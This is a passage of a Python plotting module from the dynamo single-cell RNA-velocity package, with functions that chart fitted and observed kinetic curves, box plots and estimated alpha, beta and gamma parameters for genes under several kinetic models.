7c97f85a93be22f488e5b100d6f1e0188dea1253 | 75,820 | py | Python | dynamo/plot/utils_dynamics.py | xing-lab-pitt/dynamo-release | 76c1f2a270dd6722b88f4700aac1a1a725a0c261 | [
"BSD-3-Clause"
] | 236 | 2019-07-09T22:06:21.000Z | 2022-03-31T17:56:07.000Z | dynamo/plot/utils_dynamics.py | xing-lab-pitt/dynamo-release | 76c1f2a270dd6722b88f4700aac1a1a725a0c261 | [
"BSD-3-Clause"
] | 115 | 2019-07-12T19:06:21.000Z | 2022-03-31T17:34:18.000Z | dynamo/plot/utils_dynamics.py | xing-lab-pitt/dynamo-release | 76c1f2a270dd6722b88f4700aac1a1a725a0c261 | [
"BSD-3-Clause"
] | 34 | 2019-07-10T03:34:04.000Z | 2022-03-22T12:44:22.000Z | import numpy as np
import pandas as pd
from scipy.sparse import issparse
from matplotlib.lines import Line2D
from ..tools.moments import (
prepare_data_no_splicing,
prepare_data_has_splicing,
prepare_data_mix_has_splicing,
prepare_data_mix_no_splicing,
)
from ..tools.utils import get_mapper
from .utils import _to_hex
def plot_kin_det(
adata,
genes,
has_splicing,
use_smoothed,
log_unnormalized,
t,
T,
T_uniq,
unit,
X_data,
X_fit_data,
logLL,
true_p,
grp_len,
sub_plot_n,
ncols,
boxwidth,
gs,
fig_mat,
gene_order,
y_log_scale,
true_param_prefix,
true_params,
est_params,
show_variance,
show_kin_parameters,
):
import matplotlib.pyplot as plt
true_alpha, true_beta, true_gamma = true_params
alpha, beta, gamma = est_params
if len(T_uniq) > 6:
xticks, xticks_labels = (
np.round(np.linspace(0, max(T_uniq), 6), 2),
np.round(np.linspace(0, max(T_uniq), 6), 2),
)
else:
xticks, xticks_labels = T_uniq, T_uniq
if has_splicing:
if "M_ul" in adata.layers.keys() and use_smoothed:
title_ = ["M_ul", "M_sl"]
layers = ["M_ul", "M_sl", "M_uu", "M_su"]
layer_u, layer_s = "M_ul", "M_sl"
else:
title_ = ["X_ul", "X_sl"]
layers = ["X_ul", "X_sl", "X_uu", "X_su"]
layer_u, layer_s = "X_ul", "X_sl"
_, X_raw = prepare_data_has_splicing(
adata,
genes,
T,
layer_u=layer_u,
layer_s=layer_s,
total_layers=layers,
)
else:
if "M_t" in adata.layers.keys() and use_smoothed:
title_ = ["M_n"]
total_layer = "M_t"
layer = "M_n"
else:
title_ = ["X_new"]
total_layer = "X_total"
layer = "X_new"
_, X_raw = prepare_data_no_splicing(adata, adata.var.index, T, layer=layer, total_layer=total_layer)
padding = 0.185 if not show_variance else 0
for i, gene_name in enumerate(genes):
cur_X_data, cur_X_fit_data, cur_logLL = (
X_data[i],
X_fit_data[i],
logLL[i],
)
for j in range(sub_plot_n):
row_ind = int(np.floor(i / ncols)) # make sure unlabled and labeled are in the same column.
col_loc = (row_ind * sub_plot_n + j) * ncols * grp_len + (i % ncols - 1) * grp_len + 1
row_i, col_i = np.where(fig_mat == col_loc)
ax = plt.subplot(gs[col_loc]) if gene_order == "column" else plt.subplot(gs[fig_mat[col_i, row_i][0]])
if j == 0:
ax.text(
0.01 + padding,
0.80,
r"$logLL={0:.2f}$".format(cur_logLL)
+ " \n"
+ r"$t_{1/2} = $"
+ "{0:.2f}".format(np.log(2) / gamma[i])
+ unit[0],
ha="left",
va="top",
transform=ax.transAxes,
)
if show_kin_parameters:
if true_param_prefix is not None:
if has_splicing:
ax.text(
0.01 + padding,
0.99,
r"$\alpha$"
+ ": {0:.2f}; ".format(true_alpha[i])
+ r"$\hat \alpha$"
+ ": {0:.2f} \n".format(alpha[i])
+ r"$\beta$"
+ ": {0:.2f}; ".format(true_beta[i])
+ r"$\hat \beta$"
+ ": {0:.2f} \n".format(beta[i])
+ r"$\gamma$"
+ ": {0:.2f}; ".format(true_gamma[i])
+ r"$\hat \gamma$"
+ ": {0:.2f} \n".format(gamma[i]),
ha="left",
va="top",
transform=ax.transAxes,
)
else:
ax.text(
0.01 + padding,
0.99,
r"$\alpha$"
+ ": {0:.2f}; ".format(true_alpha[i])
+ r"$\hat \alpha$"
+ ": {0:.2f} \n".format(alpha[i])
+ r"$\gamma$"
+ ": {0:.2f}; ".format(true_gamma[i])
+ r"$\hat \gamma$"
+ ": {0:.2f} \n".format(gamma[i]),
ha="left",
va="top",
transform=ax.transAxes,
)
else:
if has_splicing:
ax.text(
0.01 + padding,
0.99,
r"$\hat \alpha$"
+ ": {0:.2f} \n".format(alpha[i])
+ r"$\hat \beta$"
+ ": {0:.2f} \n".format(beta[i])
+ r"$\hat \gamma$"
+ ": {0:.2f} \n".format(gamma[i]),
ha="left",
va="top",
transform=ax.transAxes,
)
else:
ax.text(
0.01 + padding,
0.99,
r"$\hat \alpha$"
+ ": {0:.2f} \n".format(alpha[i])
+ r"$\hat \gamma$"
+ ": {0:.2f} \n".format(gamma[i]),
ha="left",
va="top",
transform=ax.transAxes,
)
if show_variance:
if has_splicing:
Obs = X_raw[i][j][0].A.flatten() if issparse(X_raw[i][j][0]) else X_raw[i][j][0].flatten()
else:
Obs = X_raw[i].A.flatten() if issparse(X_raw[i][0]) else X_raw[i].flatten()
ax.boxplot(
x=[Obs[T == std] for std in T_uniq],
positions=T_uniq,
widths=boxwidth,
showfliers=False,
showmeans=True,
)
if has_splicing:
ax.plot(T_uniq, cur_X_fit_data[j], "b")
ax.plot(T_uniq, cur_X_data[j], "k--")
else:
ax.plot(T_uniq, cur_X_fit_data.flatten(), "b")
ax.plot(T_uniq, cur_X_data.flatten(), "k--")
ax.set_title(gene_name + " (" + title_[j] + ")")
else:
ax.plot(T_uniq, cur_X_fit_data.T)
ax.legend(title_)
ax.plot(T_uniq, cur_X_data.T, "k--")
ax.set_title(gene_name)
# properly set the xticks
ax.set_xticks(xticks)
ax.set_xticklabels(xticks_labels, rotation=30, ha="right")
if true_param_prefix is not None:
if has_splicing:
ax.plot(t, true_p[j], "r")
else:
ax.plot(t, true_p[j], "r")
ax.set_xlabel("time (" + unit + ")")
if y_log_scale:
ax.set_yscale("log")
if log_unnormalized:
ax.set_ylabel("Expression (log)")
else:
ax.set_ylabel("Expression")
return gs
def plot_kin_sto(
adata,
genes,
has_splicing,
use_smoothed,
log_unnormalized,
t,
T,
T_uniq,
unit,
X_data,
X_fit_data,
logLL,
true_p,
grp_len,
sub_plot_n,
ncols,
boxwidth,
gs,
fig_mat,
gene_order,
y_log_scale,
true_param_prefix,
true_params,
est_params,
show_moms_fit,
show_variance,
show_kin_parameters,
):
import matplotlib.pyplot as plt
true_alpha, true_beta, true_gamma = true_params
alpha, beta, gamma = est_params
if len(T_uniq) > 6:
xticks, xticks_labels = (
np.round(np.linspace(0, max(T_uniq), 6), 2),
np.round(np.linspace(0, max(T_uniq), 6), 2),
)
else:
xticks, xticks_labels = T_uniq, T_uniq
if has_splicing:
if "M_ul" in adata.layers.keys() and use_smoothed:
title_ = ["M_ul", "M_sl", "M_ul2", "M_sl2", "M_ul_sl"] if show_moms_fit else ["M_ul", "M_sl"]
layers = ["M_ul", "M_sl", "M_uu", "M_su"]
layer_u, layer_s = "M_ul", "M_sl"
else:
title_ = ["X_ul", "X_sl", "X_ul2", "X_sl2", "X_ul_sl"] if show_moms_fit else ["X_ul", "X_sl"]
layers = ["X_ul", "X_sl", "X_uu", "X_su"]
layer_u, layer_s = "X_ul", "X_sl"
_, X_raw = prepare_data_has_splicing(
adata,
genes,
T,
layer_u=layer_u,
layer_s=layer_s,
total_layers=layers,
)
else:
if "M_t" in adata.layers.keys() and use_smoothed:
title_ = ["M_n", "M_n2"] if show_moms_fit else ["M_n"]
total_layer = "M_t"
layer = "M_n"
else:
title_ = ["new", "n2"] if show_moms_fit else ["new"]
total_layer = "total"
layer = "new"
_, X_raw = prepare_data_no_splicing(adata, adata.var.index, T, layer=layer, total_layer=total_layer)
padding = 0.185 if not show_variance else 0
for i, gene_name in enumerate(genes):
cur_X_data, cur_X_fit_data, cur_logLL = (
X_data[i],
X_fit_data[i],
logLL[i],
)
for j in range(sub_plot_n):
row_ind = int(np.floor(i / ncols)) # make sure unlabled and labeled are in the same column.
col_loc = (row_ind * sub_plot_n + j) * ncols * grp_len + (i % ncols - 1) * grp_len + 1
row_i, col_i = np.where(fig_mat == col_loc)
ax = plt.subplot(gs[col_loc]) if gene_order == "column" else plt.subplot(gs[fig_mat[col_i, row_i][0]])
if j == 0:
ax.text(
0.01 + padding,
0.80,
r"$logLL={0:.2f}$".format(cur_logLL)
+ " \n"
+ r"$t_{1/2} = $"
+ "{0:.2f}".format(np.log(2) / gamma[i])
+ unit[0],
ha="left",
va="top",
transform=ax.transAxes,
)
if show_kin_parameters:
if true_param_prefix is not None:
if has_splicing:
ax.text(
0.01 + padding,
0.99,
r"$\alpha$"
+ ": {0:.2f}; ".format(true_alpha[i])
+ r"$\hat \alpha$"
+ ": {0:.2f} \n".format(alpha[i])
+ r"$\beta$"
+ ": {0:.2f}; ".format(true_beta[i])
+ r"$\hat \beta$"
+ ": {0:.2f} \n".format(beta[i])
+ r"$\gamma$"
+ ": {0:.2f}; ".format(true_gamma[i])
+ r"$\hat \gamma$"
+ ": {0:.2f} \n".format(gamma[i]),
ha="left",
va="top",
transform=ax.transAxes,
)
else:
ax.text(
0.01 + padding,
0.99,
r"$\alpha$"
+ ": {0:.2f}; ".format(true_alpha[i])
+ r"$\hat \alpha$"
+ ": {0:.2f} \n".format(alpha[i])
+ r"$\gamma$"
+ ": {0:.2f}; ".format(true_gamma[i])
+ r"$\hat \gamma$"
+ ": {0:.2f} \n".format(gamma[i]),
ha="left",
va="top",
transform=ax.transAxes,
)
else:
if has_splicing:
ax.text(
0.01 + padding,
0.99,
r"$\hat \alpha$"
+ ": {0:.2f} \n".format(alpha[i])
+ r"$\hat \beta$"
+ ": {0:.2f} \n".format(beta[i])
+ r"$\hat \gamma$"
+ ": {0:.2f} \n".format(gamma[i]),
ha="left",
va="top",
transform=ax.transAxes,
)
else:
ax.text(
0.01 + padding,
0.99,
r"$\hat \alpha$"
+ ": {0:.2f} \n".format(alpha[i])
+ r"$\hat \gamma$"
+ ": {0:.2f} \n".format(gamma[i]),
ha="left",
va="top",
transform=ax.transAxes,
)
max_box_plots = 2 if has_splicing else 1
# if show_variance first plot box plot
if show_variance:
if j < max_box_plots:
if has_splicing:
Obs = X_raw[i][j][0].A.flatten() if issparse(X_raw[i][j][0]) else X_raw[i][j][0].flatten()
else:
Obs = X_raw[i].A.flatten() if issparse(X_raw[i][0]) else X_raw[i].flatten()
ax.boxplot(
x=[Obs[T == std] for std in T_uniq],
positions=T_uniq,
widths=boxwidth,
showfliers=False,
showmeans=True,
)
ax.plot(T_uniq, cur_X_fit_data[j].T, "b")
ax.plot(T_uniq, cur_X_data[j], "k--")
ax.set_title(gene_name + " (" + title_[j] + ")")
# if not show_variance then first plot line plot
else:
if j == 0:
if has_splicing:
ax.plot(T_uniq, cur_X_fit_data[[0, 1]].T)
ax.legend(title_[:2])
ax.plot(T_uniq, cur_X_data[[0, 1]].T, "k--")
else:
ax.plot(T_uniq, cur_X_fit_data[j].T)
ax.legend([title_[0]])
ax.plot(T_uniq, cur_X_data[j].T, "k--")
ax.set_title(gene_name)
# other subplots
if not ((show_variance and j < max_box_plots) or (not show_variance and j == 0)):
ax.plot(T_uniq, cur_X_fit_data[j].T)
ax.plot(T_uniq, cur_X_data[j], "k--")
if show_variance:
ax.legend([title_[j]])
else:
if has_splicing:
ax.legend([title_[j + 1]])
else:
ax.legend([title_[j]])
ax.set_title(gene_name)
# properly set the xticks
ax.set_xticks(xticks)
ax.set_xticklabels(xticks_labels, rotation=30, ha="right")
if true_param_prefix is not None:
ax.plot(t, true_p[j], "r")
ax.set_xlabel("time (" + unit + ")")
if y_log_scale:
ax.set_yscale("log")
if log_unnormalized:
ax.set_ylabel("Expression (log)")
else:
ax.set_ylabel("Expression")
return gs
def plot_kin_mix(
adata,
genes,
has_splicing,
use_smoothed,
log_unnormalized,
t,
T,
T_uniq,
unit,
X_data,
X_fit_data,
logLL,
true_p,
grp_len,
sub_plot_n,
ncols,
boxwidth,
gs,
fig_mat,
gene_order,
y_log_scale,
true_param_prefix,
true_params,
est_params,
show_variance,
show_kin_parameters,
):
import matplotlib.pyplot as plt
true_alpha, true_beta, true_gamma = true_params
alpha, beta, gamma = est_params
if len(T_uniq) > 6:
xticks, xticks_labels = (
np.round(np.linspace(0, max(T_uniq), 6), 2),
np.round(np.linspace(0, max(T_uniq), 6), 2),
)
else:
xticks, xticks_labels = T_uniq, T_uniq
if has_splicing:
if "M_ul" in adata.layers.keys() and use_smoothed:
title_ = ["M_ul", "M_sl", "M_uu", "M_su"]
layers = ["M_ul", "M_sl", "M_uu", "M_su"]
layer_u, layer_s = "M_ul", "M_sl"
else:
title_ = ["X_ul", "X_sl", "X_uu", "X_su"]
layers = ["X_ul", "X_sl", "X_uu", "X_su"]
layer_u, layer_s = "X_ul", "X_sl"
_, X_raw = prepare_data_has_splicing(
adata,
genes,
T,
layer_u=layer_u,
layer_s=layer_s,
total_layers=layers,
)
else:
if "M_t" in adata.layers.keys() and use_smoothed:
title_ = ["M_n", "M_o"]
total_layer = "M_t"
layer = "M_n"
else:
title_ = ["new", "old"]
total_layer = "total"
layer = "new"
_, X_raw = prepare_data_no_splicing(
adata,
adata.var.index,
T,
layer=layer,
total_layer=total_layer,
return_old=True,
)
padding = 0.185 if not show_variance else 0
for i, gene_name in enumerate(genes):
cur_X_data, cur_X_fit_data, cur_logLL = (
X_data[i],
X_fit_data[i],
logLL[i],
)
for j in range(sub_plot_n):
row_ind = int(np.floor(i / ncols)) # make sure unlabled and labeled are in the same column.
col_loc = (row_ind * sub_plot_n + j) * ncols * grp_len + (i % ncols - 1) * grp_len + 1
row_i, col_i = np.where(fig_mat == col_loc)
ax = plt.subplot(gs[col_loc]) if gene_order == "column" else plt.subplot(gs[fig_mat[col_i, row_i][0]])
if j == 0:
ax.text(
0.01 + padding,
0.80,
r"$logLL={0:.2f}$".format(cur_logLL)
+ " \n"
+ r"$t_{1/2} = $"
+ "{0:.2f}".format(np.log(2) / gamma[i])
+ unit[0],
ha="left",
va="top",
transform=ax.transAxes,
)
if show_kin_parameters:
if true_param_prefix is not None:
if has_splicing:
ax.text(
0.01 + padding,
0.99,
r"$\alpha$"
+ ": {0:.2f}; ".format(true_alpha[i])
+ r"$\hat \alpha$"
+ ": {0:.2f} \n".format(alpha[i])
+ r"$\beta$"
+ ": {0:.2f}; ".format(true_beta[i])
+ r"$\hat \beta$"
+ ": {0:.2f} \n".format(beta[i])
+ r"$\gamma$"
+ ": {0:.2f}; ".format(true_gamma[i])
+ r"$\hat \gamma$"
+ ": {0:.2f} \n".format(gamma[i]),
ha="left",
va="top",
transform=ax.transAxes,
)
else:
ax.text(
0.01 + padding,
0.99,
r"$\alpha$"
+ ": {0:.2f}; ".format(true_alpha[i])
+ r"$\hat \alpha$"
+ ": {0:.2f} \n".format(alpha[i])
+ r"$\gamma$"
+ ": {0:.2f}; ".format(true_gamma[i])
+ r"$\hat \gamma$"
+ ": {0:.2f} \n".format(gamma[i]),
ha="left",
va="top",
transform=ax.transAxes,
)
else:
if has_splicing:
ax.text(
0.01 + padding,
0.99,
r"$\hat \alpha$"
+ ": {0:.2f} \n".format(alpha[i])
+ r"$\hat \beta$"
+ ": {0:.2f} \n".format(beta[i])
+ r"$\hat \gamma$"
+ ": {0:.2f} \n".format(gamma[i]),
ha="left",
va="top",
transform=ax.transAxes,
)
else:
ax.text(
0.01 + padding,
0.99,
r"$\hat \alpha$"
+ ": {0:.2f} \n".format(alpha[i])
+ r"$\hat \gamma$"
+ ": {0:.2f} \n".format(gamma[i]),
ha="left",
va="top",
transform=ax.transAxes,
)
max_box_plots = 2 if has_splicing else 1
max_line_plots = 2 if has_splicing else 1
# if show_variance first plot box plot
if show_variance:
if j < max_box_plots:
if has_splicing:
Obs = X_raw[i][j][0].A.flatten() if issparse(X_raw[i][j][0]) else X_raw[i][j][0].flatten()
else:
Obs = X_raw[i][j][0].A.flatten() if issparse(X_raw[i][j][0]) else X_raw[i][j][0].flatten()
ax.boxplot(
x=[Obs[T == std] for std in T_uniq],
positions=T_uniq,
widths=boxwidth,
showfliers=False,
showmeans=True,
)
ax.plot(T_uniq, cur_X_fit_data[j].T, "b")
ax.plot(T_uniq, cur_X_data[j], "k--")
ax.set_title(gene_name + " (" + title_[j] + ")")
# if not show_variance then first plot line plot
else:
if has_splicing:
if j == 0:
ax.plot(T_uniq, cur_X_fit_data[[0, 1]].T)
ax.plot(T_uniq, cur_X_data[[0, 1]].T, "k--")
ax.legend(title_[:2])
elif j == 1:
ax.plot(T_uniq, cur_X_fit_data[[2, 3]].T)
ax.plot(T_uniq, cur_X_data[[2, 3]].T, "k--")
ax.legend(title_[2:4])
ax.set_title(gene_name)
else:
if j == 0:
ax.plot(T_uniq, cur_X_fit_data[[0, 1]].T)
ax.plot(T_uniq, cur_X_data[[0, 1]].T, "k--")
ax.legend(title_[:2])
ax.set_title(gene_name)
# other subplots
if not ((show_variance and j < max_box_plots) or (not show_variance and j < max_line_plots)):
ax.plot(T_uniq, cur_X_fit_data[j].T)
ax.plot(T_uniq, cur_X_data[j], "k--")
if show_variance:
ax.legend([title_[j]])
else:
if has_splicing:
ax.legend([title_[j + 2]])
else:
ax.legend([title_[j + 1]])
ax.set_title(gene_name)
# properly set the xticks
ax.set_xticks(xticks)
ax.set_xticklabels(xticks_labels, rotation=30, ha="right")
if true_param_prefix is not None:
ax.plot(t, true_p[j], "r")
ax.set_xlabel("time (" + unit + ")")
if y_log_scale:
ax.set_yscale("log")
if log_unnormalized:
ax.set_ylabel("Expression (log)")
else:
ax.set_ylabel("Expression")
return gs
def plot_kin_mix_det_sto(
adata,
genes,
has_splicing,
use_smoothed,
log_unnormalized,
t,
T,
T_uniq,
unit,
X_data,
X_fit_data,
logLL,
true_p,
grp_len,
sub_plot_n,
ncols,
boxwidth,
gs,
fig_mat,
gene_order,
y_log_scale,
true_param_prefix,
true_params,
est_params,
show_moms_fit,
show_variance,
show_kin_parameters,
):
import matplotlib.pyplot as plt
true_alpha, true_beta, true_gamma = true_params
alpha, beta, gamma = est_params
if len(T_uniq) > 6:
xticks, xticks_labels = (
np.round(np.linspace(0, max(T_uniq), 6), 2),
np.round(np.linspace(0, max(T_uniq), 6), 2),
)
else:
xticks, xticks_labels = T_uniq, T_uniq
if has_splicing:
if "M_ul" in adata.layers.keys() and use_smoothed:
title_ = (
["M_ul", "M_sl", "M_uu", "M_su", "M_uu2", "M_su2", "M_uu_su"]
if show_moms_fit
else ["M_ul", "M_sl", "M_uu", "M_su"]
)
layers = ["M_ul", "M_sl", "M_uu", "M_su"]
else:
title_ = (
["X_ul", "X_sl", "X_uu", "X_su", "X_uu2", "X_su2", "X_uu_su"]
if show_moms_fit
else ["X_ul", "X_sl", "X_uu", "X_su"]
)
layers = ["X_ul", "X_sl", "X_uu", "X_su"]
_, X_raw = prepare_data_mix_has_splicing(
adata,
adata.var.index,
T,
layer_u=layers[2],
layer_s=layers[3],
layer_ul=layers[0],
layer_sl=layers[1],
total_layers=layers,
mix_model_indices=[0, 1, 5, 6, 7, 8, 9],
)
else:
if "M_t" in adata.layers.keys() and use_smoothed:
title_ = ["M_n", "M_o", "M_o2"] if show_moms_fit else ["M_n", "M_o"]
layers = ["M_n", "M_t"]
total_layer = "M_t"
else:
title_ = ["X_new", "X_old", "X_o2"] if show_moms_fit else ["X_new", "X_old"]
layers = ["X_new", "X_total"]
total_layer = "X_total"
_, X_raw = prepare_data_mix_no_splicing(
adata,
adata.var.index,
T,
layer_n=layers[0],
layer_t=layers[1],
total_layer=total_layer,
mix_model_indices=[0, 2, 3],
)
padding = 0.185 if not show_variance else 0
for i, gene_name in enumerate(genes):
cur_X_data, cur_X_fit_data, cur_logLL = (
X_data[i],
X_fit_data[i],
logLL[i],
)
for j in range(sub_plot_n):
row_ind = int(np.floor(i / ncols)) # make sure unlabled and labeled are in the same column.
col_loc = (row_ind * sub_plot_n + j) * ncols * grp_len + (i % ncols - 1) * grp_len + 1
row_i, col_i = np.where(fig_mat == col_loc)
ax = plt.subplot(gs[col_loc]) if gene_order == "column" else plt.subplot(gs[fig_mat[col_i, row_i][0]])
if j == 0:
ax.text(
0.01 + padding,
0.80,
r"$logLL={0:.2f}$".format(cur_logLL)
+ " \n"
+ r"$t_{1/2} = $"
+ "{0:.2f}".format(np.log(2) / gamma[i])
+ unit[0],
ha="left",
va="top",
transform=ax.transAxes,
)
if show_kin_parameters:
if true_param_prefix is not None:
if has_splicing:
ax.text(
0.01 + padding,
0.99,
r"$\alpha$"
+ ": {0:.2f}; ".format(true_alpha[i])
+ r"$\hat \alpha$"
+ ": {0:.2f} \n".format(alpha[i])
+ r"$\beta$"
+ ": {0:.2f}; ".format(true_beta[i])
+ r"$\hat \beta$"
+ ": {0:.2f} \n".format(beta[i])
+ r"$\gamma$"
+ ": {0:.2f}; ".format(true_gamma[i])
+ r"$\hat \gamma$"
+ ": {0:.2f} \n".format(gamma[i]),
ha="left",
va="top",
transform=ax.transAxes,
)
else:
ax.text(
0.01 + padding,
0.99,
r"$\alpha$"
+ ": {0:.2f}; ".format(true_alpha[i])
+ r"$\hat \alpha$"
+ ": {0:.2f} \n".format(alpha[i])
+ r"$\gamma$"
+ ": {0:.2f}; ".format(true_gamma[i])
+ r"$\hat \gamma$"
+ ": {0:.2f} \n".format(gamma[i]),
ha="left",
va="top",
transform=ax.transAxes,
)
else:
if has_splicing:
ax.text(
0.01 + padding,
0.99,
r"$\hat \alpha$"
+ ": {0:.2f} \n".format(alpha[i])
+ r"$\hat \beta$"
+ ": {0:.2f} \n".format(beta[i])
+ r"$\hat \gamma$"
+ ": {0:.2f} \n".format(gamma[i]),
ha="left",
va="top",
transform=ax.transAxes,
)
else:
ax.text(
0.01 + padding,
0.99,
r"$\hat \alpha$"
+ ": {0:.2f} \n".format(alpha[i])
+ r"$\hat \gamma$"
+ ": {0:.2f} \n".format(gamma[i]),
ha="left",
va="top",
transform=ax.transAxes,
)
max_box_plots = 4 if has_splicing else 2
max_line_plots = 2 if has_splicing else 1
# if show_variance first plot box plot
if show_variance:
if j < max_box_plots:
if has_splicing:
Obs = X_raw[i][j][0].A.flatten() if issparse(X_raw[i][j][0]) else X_raw[i][j][0].flatten()
else:
Obs = X_raw[i][j][0].A.flatten() if issparse(X_raw[i][j][0]) else X_raw[i][j][0].flatten()
ax.boxplot(
x=[Obs[T == std] for std in T_uniq],
positions=T_uniq,
widths=boxwidth,
showfliers=False,
showmeans=True,
)
ax.plot(T_uniq, cur_X_fit_data[j].T, "b")
ax.plot(T_uniq, cur_X_data[j], "k--")
ax.set_title(gene_name + " (" + title_[j] + ")")
# if not show_variance then first plot line plot
else:
if has_splicing:
if j == 0:
ax.plot(T_uniq, cur_X_fit_data[[0, 1]].T)
ax.plot(T_uniq, cur_X_data[[0, 1]].T, "k--")
ax.legend(title_[:2])
elif j == 1:
ax.plot(T_uniq, cur_X_fit_data[[2, 3]].T)
ax.plot(T_uniq, cur_X_data[[2, 3]].T, "k--")
ax.legend(title_[2:4])
ax.set_title(gene_name)
else:
if j == 0:
ax.plot(T_uniq, cur_X_fit_data[[0, 1]].T)
ax.plot(T_uniq, cur_X_data[[0, 1]].T, "k--")
ax.legend(title_[:2])
ax.set_title(gene_name)
# other subplots
if not ((show_variance and j < max_box_plots) or (not show_variance and j < max_line_plots)):
ax.plot(T_uniq, cur_X_fit_data[j].T)
ax.plot(T_uniq, cur_X_data[j], "k--")
if show_variance:
ax.legend([title_[j]])
else:
if has_splicing:
ax.legend([title_[j + 2]])
else:
ax.legend([title_[j + 1]])
ax.set_title(gene_name)
# properly set the xticks
ax.set_xticks(xticks)
ax.set_xticklabels(xticks_labels, rotation=30, ha="right")
if true_param_prefix is not None:
ax.plot(t, true_p[j], "r")
ax.set_xlabel("time (" + unit + ")")
if y_log_scale:
ax.set_yscale("log")
if log_unnormalized:
ax.set_ylabel("Expression (log)")
else:
ax.set_ylabel("Expression")
return gs
def plot_kin_mix_sto_sto(
adata,
genes,
has_splicing,
use_smoothed,
log_unnormalized,
t,
T,
T_uniq,
unit,
X_data,
X_fit_data,
logLL,
true_p,
grp_len,
sub_plot_n,
ncols,
boxwidth,
gs,
fig_mat,
gene_order,
y_log_scale,
true_param_prefix,
true_params,
est_params,
show_moms_fit,
show_variance,
show_kin_parameters,
):
import matplotlib.pyplot as plt
true_alpha, true_beta, true_gamma = true_params
alpha, beta, gamma = est_params
if len(T_uniq) > 6:
xticks, xticks_labels = (
np.round(np.linspace(0, max(T_uniq), 6), 2),
np.round(np.linspace(0, max(T_uniq), 6), 2),
)
else:
xticks, xticks_labels = T_uniq, T_uniq
if has_splicing:
if "M_ul" in adata.layers.keys() and use_smoothed:
title_ = (
[
"M_ul",
"M_sl",
"M_uu",
"M_su",
"M_ul2",
"M_sl2",
"M_ul_sl",
"M_uu2",
"M_su2",
"M_uu_su",
]
if show_moms_fit
else ["M_ul", "M_sl", "M_uu", "M_su"]
)
layers = ["M_ul", "M_sl", "M_uu", "M_su"]
else:
title_ = (
[
"X_ul",
"X_sl",
"X_uu",
"X_su",
"X_ul2",
"X_sl2",
"X_ul_sl",
"X_uu2",
"X_su2",
"X_uu_su",
]
if show_moms_fit
else ["X_ul", "X_sl", "X_uu", "X_su"]
)
layers = ["X_ul", "X_sl", "X_uu", "X_su"]
reorder_inds = [0, 1, 5, 6, 2, 3, 4, 7, 8, 9]
_, X_raw = prepare_data_mix_has_splicing(
adata,
adata.var.index,
T,
layer_u=layers[2],
layer_s=layers[3],
layer_ul=layers[0],
layer_sl=layers[1],
total_layers=layers,
mix_model_indices=reorder_inds,
)
else:
if "M_t" in adata.layers.keys() and use_smoothed:
title_ = ["M_n", "M_o", "M_n2", "M_o2"] if show_moms_fit else ["M_n", "M_o"]
total_layer = "M_t"
layers = ["M_n", "M_t"]
else:
title_ = ["X_new", "X_old", "X_n2", "X_o2"] if show_moms_fit else ["X_new", "X_old"]
total_layer = "X_total"
layers = ["X_new", "X_total"]
reorder_inds = [0, 2, 1, 3]
_, X_raw = prepare_data_mix_no_splicing(
adata,
adata.var.index,
T,
layer_n=layers[0],
layer_t=layers[1],
total_layer=total_layer,
mix_model_indices=reorder_inds,
)
padding = 0.185 if not show_variance else 0
for i, gene_name in enumerate(genes):
cur_X_data, cur_X_fit_data, cur_logLL = (
X_data[i],
X_fit_data[i],
logLL[i],
)
cur_X_fit_data = cur_X_fit_data[reorder_inds]
cur_X_data = cur_X_data[reorder_inds]
for j in range(sub_plot_n):
row_ind = int(np.floor(i / ncols)) # make sure unlabled and labeled are in the same column.
col_loc = (row_ind * sub_plot_n + j) * ncols * grp_len + (i % ncols - 1) * grp_len + 1
row_i, col_i = np.where(fig_mat == col_loc)
ax = plt.subplot(gs[col_loc]) if gene_order == "column" else plt.subplot(gs[fig_mat[col_i, row_i][0]])
if j == 0:
ax.text(
0.01 + padding,
0.80,
r"$logLL={0:.2f}$".format(cur_logLL)
+ " \n"
+ r"$t_{1/2} = $"
+ "{0:.2f}".format(np.log(2) / gamma[i])
+ unit[0],
ha="left",
va="top",
transform=ax.transAxes,
)
if show_kin_parameters:
if true_param_prefix is not None:
if has_splicing:
ax.text(
0.01 + padding,
0.99,
r"$\alpha$"
+ ": {0:.2f}; ".format(true_alpha[i])
+ r"$\hat \alpha$"
+ ": {0:.2f} \n".format(alpha[i])
+ r"$\beta$"
+ ": {0:.2f}; ".format(true_beta[i])
+ r"$\hat \beta$"
+ ": {0:.2f} \n".format(beta[i])
+ r"$\gamma$"
+ ": {0:.2f}; ".format(true_gamma[i])
+ r"$\hat \gamma$"
+ ": {0:.2f} \n".format(gamma[i]),
ha="left",
va="top",
transform=ax.transAxes,
)
else:
ax.text(
0.01 + padding,
0.99,
r"$\alpha$"
+ ": {0:.2f}; ".format(true_alpha[i])
+ r"$\hat \alpha$"
+ ": {0:.2f} \n".format(alpha[i])
+ r"$\gamma$"
+ ": {0:.2f}; ".format(true_gamma[i])
+ r"$\hat \gamma$"
+ ": {0:.2f} \n".format(gamma[i]),
ha="left",
va="top",
transform=ax.transAxes,
)
else:
if has_splicing:
ax.text(
0.01 + padding,
0.99,
r"$\hat \alpha$"
+ ": {0:.2f} \n".format(alpha[i])
+ r"$\hat \beta$"
+ ": {0:.2f} \n".format(beta[i])
+ r"$\hat \gamma$"
+ ": {0:.2f} \n".format(gamma[i]),
ha="left",
va="top",
transform=ax.transAxes,
)
else:
ax.text(
0.01 + padding,
0.99,
r"$\hat \alpha$"
+ ": {0:.2f} \n".format(alpha[i])
+ r"$\hat \gamma$"
+ ": {0:.2f} \n".format(gamma[i]),
ha="left",
va="top",
transform=ax.transAxes,
)
max_box_plots = 4 if has_splicing else 2
max_line_plots = 2 if has_splicing else 1
# if show_variance first plot box plot
if show_variance:
if j < max_box_plots:
if has_splicing:
Obs = X_raw[i][j][0].A.flatten() if issparse(X_raw[i][j][0]) else X_raw[i][j][0].flatten()
else:
Obs = X_raw[i][j][0].A.flatten() if issparse(X_raw[i][j][0]) else X_raw[i][j][0].flatten()
ax.boxplot(
x=[Obs[T == std] for std in T_uniq],
positions=T_uniq,
widths=boxwidth,
showfliers=False,
showmeans=True,
)
ax.plot(T_uniq, cur_X_fit_data[j].T, "b")
ax.plot(T_uniq, cur_X_data[j], "k--")
ax.set_title(gene_name + " (" + title_[j] + ")")
# if not show_variance then first plot line plot
else:
if has_splicing:
if j == 0:
ax.plot(T_uniq, cur_X_fit_data[[0, 1]].T)
ax.plot(T_uniq, cur_X_data[[0, 1]].T, "k--")
ax.legend(title_[:2])
elif j == 1:
ax.plot(T_uniq, cur_X_fit_data[[2, 3]].T)
